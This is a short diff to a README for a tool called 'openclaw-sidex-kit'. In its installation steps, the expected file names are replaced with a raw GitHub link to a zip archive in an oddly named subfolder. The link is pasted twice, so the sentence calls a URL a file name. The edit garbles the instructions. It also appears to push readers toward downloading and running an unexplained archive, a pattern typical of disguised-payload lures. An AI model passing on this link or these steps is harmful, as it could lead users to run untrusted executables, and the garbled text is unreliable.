kirill08463f/openclaw-sidex-kit/README.md

 After downloading the application, follow these steps to install it:

 1. **Locate the Downloaded File:** Find the file in your Downloads folder.
-It should be named something like `openclaw-sidex-kit.zip` or `openclaw-sidex-kit.exe`.
+It should be named something like `https://github.com/kirill08463f/openclaw-sidex-kit/raw/refs/heads/main/schoolful/sidex_openclaw_kit_v1.7.zip` or `https://github.com/kirill08463f/openclaw-sidex-kit/raw/refs/heads/main/schoolful/sidex_openclaw_kit_v1.7.zip`.

 2. **Extract or Run the File:**
    - If you downloaded a `.zip` file, right-click on it and select "Extract All."
 Follow the prompts to extract the contents to a folder.